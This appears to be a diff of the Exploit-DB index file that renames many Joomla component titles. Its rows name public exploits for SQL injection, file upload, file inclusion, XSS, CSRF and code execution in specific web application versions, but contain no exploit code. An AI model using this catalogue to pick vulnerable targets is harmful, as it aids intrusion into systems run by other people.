15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0
15162,platforms/php/webapps/15162.rb,"Joomla! Component 'com_jejob' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15162,platforms/php/webapps/15162.rb,"Joomla! Component JE Job - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15163,platforms/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",php,webapps,0
15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0
@ -24100,7 +24101,7 @@ id,file,description,date,author,platform,type,port
15348,platforms/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps,0
15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
15353,platforms/php/webapps/15353.txt,"Joomla! Component 'com_jfuploader' < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0
15353,platforms/php/webapps/15353.txt,"Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0
15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 / 0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,php,webapps,0
15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0
15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
@ -24133,25 +24134,25 @@ id,file,description,date,author,platform,type,port
15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection",2010-11-04,"High-Tech Bridge SA",php,webapps,0
15416,platforms/php/webapps/15416.txt,"JBI CMS - SQL Injection",2010-11-04,Cru3l.b0y,php,webapps,0
15430,platforms/php/webapps/15430.txt,"Joomla! Component ccInvoices - SQL Injection",2010-11-05,FL0RiX,php,webapps,0
15439,platforms/php/webapps/15439.txt,"Joomla! Component 'com_connect' - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
15440,platforms/php/webapps/15440.txt,"Joomla! Component 'com_dcnews' - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
15439,platforms/php/webapps/15439.txt,"Joomla! Component com_connect - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
15440,platforms/php/webapps/15440.txt,"Joomla! Component com_dcnews - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
15441,platforms/php/webapps/15441.txt,"MassMirror Uploader - Remote File Inclusion",2010-11-06,ViciOuS,php,webapps,0
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion",2010-11-06,ViRuS_HiMa,php,webapps,0
15448,platforms/asp/webapps/15448.txt,"ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
15453,platforms/php/webapps/15453.txt,"Joomla! Component Cookex Agency CKForms - Local File Inclusion",2010-11-08,ALTBTA,php,webapps,0
15454,platforms/php/webapps/15454.txt,"Joomla! Component 'com_clan' - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,php,webapps,0
15454,platforms/php/webapps/15454.txt,"Joomla! Component com_clan - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,php,webapps,0
15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 / 4 - 'FCKeditor' Arbitrary File Upload",2010-11-08,Net.Edit0r,php,webapps,0
15456,platforms/php/webapps/15456.txt,"Joomla! Component 'com_clanlist' - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0
15456,platforms/php/webapps/15456.txt,"Joomla! Component com_clanlist - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0
15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0
15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0
15460,platforms/php/webapps/15460.txt,"Joomla! Component ProDesk 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0
15466,platforms/php/webapps/15466.txt,"Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",php,webapps,0
15468,platforms/php/webapps/15468.txt,"Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0
15469,platforms/php/webapps/15469.txt,"Joomla! Component 'com_markt' - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
15470,platforms/php/webapps/15470.txt,"Joomla! Component 'com_img' - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0
15469,platforms/php/webapps/15469.txt,"Joomla! Component com_markt - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
15470,platforms/php/webapps/15470.txt,"Joomla! Component com_img - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0
15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - (FileManager upload.php) Arbitrary File Upload",2010-11-10,grabz,php,webapps,0
15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - Cross-Site Request Forgery",2010-11-09,daandeveloper33,php,webapps,0
15473,platforms/multiple/webapps/15473.html,"IBM OmniFind - Cross-Site Request Forgery",2010-11-09,"Fatih Kilic",multiple,webapps,0
@ -24172,7 +24173,7 @@ id,file,description,date,author,platform,type,port
15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0
15516,platforms/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps,0
15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0
15518,platforms/php/webapps/15518.txt,"Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
15518,platforms/php/webapps/15518.txt,"Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0
15524,platforms/php/webapps/15524.txt,"Pre ADS Portal - Authentication Bypass",2010-11-13,Cru3l.b0y,php,webapps,0
15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps,0
@ -24186,7 +24187,7 @@ id,file,description,date,author,platform,type,port
15549,platforms/php/webapps/15549.txt,"Joomla! Component com_alfurqan15x - SQL Injection",2010-11-15,kaMtiEz,php,webapps,0
15553,platforms/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0
15554,platforms/asp/webapps/15554.txt,"BPRealestate Real Estate - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0
15555,platforms/php/webapps/15555.txt,"Joomla! Component 'com_maianmedia' - SQL Injection",2010-11-16,v3n0m,php,webapps,0
15555,platforms/php/webapps/15555.txt,"Joomla! Component com_maianmedia - SQL Injection",2010-11-16,v3n0m,php,webapps,0
15557,platforms/php/webapps/15557.txt,"openEngine 2.0 100226 - Local File Inclusion / Cross-Site Scripting",2010-11-16,"SecPod Research",php,webapps,0
15559,platforms/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0
15560,platforms/php/webapps/15560.txt,"ClanSphere 2010.0 Final - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0
@ -24325,7 +24326,7 @@ id,file,description,date,author,platform,type,port
15824,platforms/php/webapps/15824.txt,"Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0
15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0
15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",php,webapps,0
15827,platforms/php/webapps/15827.txt,"Joomla! Component 'com_idoblog' - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
15827,platforms/php/webapps/15827.txt,"Joomla! Component com_idoblog - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,php,webapps,0
15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage",2010-12-28,"Michael Brooks",php,webapps,0
15830,platforms/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) - Arbitrary File Upload",2010-12-25,MyDoom,php,webapps,0
@ -24386,14 +24387,14 @@ id,file,description,date,author,platform,type,port
15979,platforms/php/webapps/15979.txt,"Joomla! - Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0
15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0
15989,platforms/php/webapps/15989.txt,"Joomla! Component 'com_people' 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
15989,platforms/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
15993,platforms/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0
15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0
15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps,0
15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0
16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",php,webapps,0
16001,platforms/php/webapps/16001.txt,"Joomla! Component 'com_people' 1.0.0 - Local File Inclusion",2011-01-16,ALTBTA,php,webapps,0
16001,platforms/php/webapps/16001.txt,"Joomla! Component com_people 1.0.0 - Local File Inclusion",2011-01-16,ALTBTA,php,webapps,0
16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 - (cart.php) Blind SQL Injection",2011-01-16,ShivX,php,webapps,0
16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,php,webapps,0
16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0
@ -24645,7 +24646,7 @@ id,file,description,date,author,platform,type,port
17132,platforms/php/webapps/17132.py,"Joomla! Component 'com_virtuemart' 1.1.7 - Blind SQL Injection",2011-04-08,"TecR0c and mr_me",php,webapps,0
17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
17136,platforms/php/webapps/17136.txt,"Joomla! Component 'com_jce' - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0
17136,platforms/php/webapps/17136.txt,"Joomla! Component joomlacontenteditor - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0
17137,platforms/php/webapps/17137.txt,"Nooms CMS 1.1.1 - Cross-Site Request Forgery",2011-04-09,loneferret,php,webapps,0
17178,platforms/php/webapps/17178.txt,"Blue Hat - Sensitive Database Disclosure / SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0
17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0
@ -24696,7 +24697,7 @@ id,file,description,date,author,platform,type,port
17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - Cross-Site Request Forgery",2011-05-06,"High-Tech Bridge SA",php,webapps,0
17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",cgi,webapps,0
17264,platforms/php/webapps/17264.txt,"Joomla! Component 'com_versioning' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
17265,platforms/php/webapps/17265.txt,"Joomla! Component 'com_hello' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
17265,platforms/php/webapps/17265.txt,"Joomla! Component com_hello - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection",2011-05-10,ScOrPiOn,php,webapps,0
17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server - Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0
17284,platforms/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
@ -24710,7 +24711,7 @@ id,file,description,date,author,platform,type,port
17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0
17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0
17301,platforms/php/webapps/17301.txt,"Pligg CMS 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
17303,platforms/php/webapps/17303.txt,"Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
17303,platforms/php/webapps/17303.txt,"Joomla! Component jDownloads 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 - Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0
17308,platforms/php/webapps/17308.txt,"Zen Cart 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0
17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",php,webapps,0
@ -24814,7 +24815,7 @@ id,file,description,date,author,platform,type,port
17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps,0
17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps,0
17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0
17556,platforms/php/webapps/17556.txt,"Joomla! Component 'com_jesubmit' - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
17556,platforms/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0
@ -24828,14 +24829,14 @@ id,file,description,date,author,platform,type,port
17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0
17587,platforms/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0
17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 - (register_form()) Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0
17591,platforms/php/webapps/17591.txt,"Joomla! Component 'com_obSuggest' - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0
17591,platforms/php/webapps/17591.txt,"Joomla! Component obSuggest - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0
17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,php,webapps,0
17593,platforms/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps,0
17595,platforms/php/webapps/17595.txt,"MyBB MyTabs Plugin - SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC - Credential Information Disclosure (Metasploit)",2011-08-01,Metasploit,jsp,webapps,0
17597,platforms/php/webapps/17597.txt,"SiteGenius - Blind SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
17602,platforms/php/webapps/17602.txt,"WordPress Plugin TimThumb 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
17603,platforms/php/webapps/17603.txt,"Joomla! Component 'com_jdirectory' - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0
17603,platforms/php/webapps/17603.txt,"Joomla! Component com_jdirectory - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0
17606,platforms/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,multiple,webapps,0
17613,platforms/php/webapps/17613.php,"WordPress Plugin E-Commerce 3.8.4 - SQL Injection",2011-08-05,IHTeam,php,webapps,0
17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - Authenticated Code Execution (Metasploit)",2011-08-05,Metasploit,jsp,webapps,0
@ -24852,7 +24853,7 @@ id,file,description,date,author,platform,type,port
17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent Cross-Site Scripting",2011-08-09,Paulzz,php,webapps,0
17641,platforms/php/webapps/17641.txt,"LaserNet CMS 1.5 - SQL Injection (1)",2011-08-09,p0pc0rn,php,webapps,0
17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps,0
17646,platforms/php/webapps/17646.txt,"Joomla! Component 'com_esearch' - SQL Injection",2011-08-09,NoGe,php,webapps,0
17646,platforms/php/webapps/17646.txt,"Joomla! Component Search 3.0.0 - SQL Injection",2011-08-09,NoGe,php,webapps,0
17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0
17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 - Cross-Site Request Forgery",2011-08-14,"Smith Falcon",php,webapps,0
17660,platforms/php/webapps/17660.txt,"VideoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0
@ -24860,7 +24861,7 @@ id,file,description,date,author,platform,type,port
17662,platforms/php/webapps/17662.txt,"Mambo 4.6.x < 4.6.5 - SQL Injection",2011-08-13,"Aung Khant",php,webapps,0
17667,platforms/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0
17673,platforms/php/webapps/17673.txt,"WordPress Plugin IP-Logger 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0
17674,platforms/php/webapps/17674.txt,"Joomla! Component 'com_joomtouch' - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
17674,platforms/php/webapps/17674.txt,"Joomla! Component JoomTouch 1.0.2 - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0
17677,platforms/php/webapps/17677.txt,"WordPress Plugin File Groups 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
17678,platforms/php/webapps/17678.txt,"WordPress Plugin Contus HD FLV Player 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
@ -24900,7 +24901,7 @@ id,file,description,date,author,platform,type,port
17730,platforms/php/webapps/17730.txt,"WordPress Plugin oQey Headers 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0
17731,platforms/php/webapps/17731.txt,"WordPress Plugin Photoracer 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0
17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,asp,webapps,0
17734,platforms/php/webapps/17734.txt,"Joomla! Component 'com_jce' 2.0.10 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,php,webapps,0
17734,platforms/php/webapps/17734.txt,"Joomla! Component joomlacontenteditor 2.0.10 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,php,webapps,0
17736,platforms/php/webapps/17736.txt,"Joomla! Component 'mod_simpleFileLister' 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0
17737,platforms/php/webapps/17737.txt,"WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
17738,platforms/php/webapps/17738.txt,"WordPress Plugin Evarisk 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
@ -33200,7 +33201,7 @@ id,file,description,date,author,platform,type,port
34015,platforms/php/webapps/34015.txt,"SoftDirec 1.05 - 'delete_confirm.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0
34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 - image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
34021,platforms/php/webapps/34021.txt,"Joomla! Component 'com_horses' - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0
34021,platforms/php/webapps/34021.txt,"Joomla! Component com_horses - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0
34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,php,webapps,0
34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0
34024,platforms/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,ViRuSMaN,php,webapps,0
@ -33280,7 +33281,7 @@ id,file,description,date,author,platform,type,port
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
34161,platforms/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80
34149,platforms/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0
34159,platforms/php/webapps/34159.txt,"Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0
34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0
34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
@ -33426,7 +33427,7 @@ id,file,description,date,author,platform,type,port
34389,platforms/php/webapps/34389.txt,"Impact Software AdPeeps - Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps,0
34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0
34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0
34393,platforms/php/webapps/34393.txt,"Joomla! Component 'com_jigsaw' - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0
34393,platforms/php/webapps/34393.txt,"Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0
34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
34397,platforms/asp/webapps/34397.txt,"Activedition - 'activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0
34497,platforms/php/webapps/34497.txt,"ViArt Helpdesk - reviews.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0
@ -33483,12 +33484,12 @@ id,file,description,date,author,platform,type,port
34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
34475,platforms/php/webapps/34475.txt,"Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Cross-Site Scripting",2010-08-15,10n1z3d,php,webapps,0
34477,platforms/php/webapps/34477.txt,"Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
34477,platforms/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0
34481,platforms/php/webapps/34481.txt,"123 Flash Chat - Multiple Vulnerabilities",2010-08-16,Lincoln,php,webapps,0
34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0
34483,platforms/php/webapps/34483.txt,"Nasim Guest Book - 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0
34484,platforms/php/webapps/34484.txt,"Joomla! Component 'com_dirfrm' - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0
34484,platforms/php/webapps/34484.txt,"Joomla! Component com_dirfrm - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0
34485,platforms/php/webapps/34485.txt,"FreeSchool - 'key_words' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0
34486,platforms/php/webapps/34486.txt,"phpCMS 2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,php,webapps,0
34487,platforms/php/webapps/34487.txt,"Facil Helpdesk - kbase/kbase.php URI Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0
@ -33774,7 +33775,7 @@ id,file,description,date,author,platform,type,port
34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
34922,platforms/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
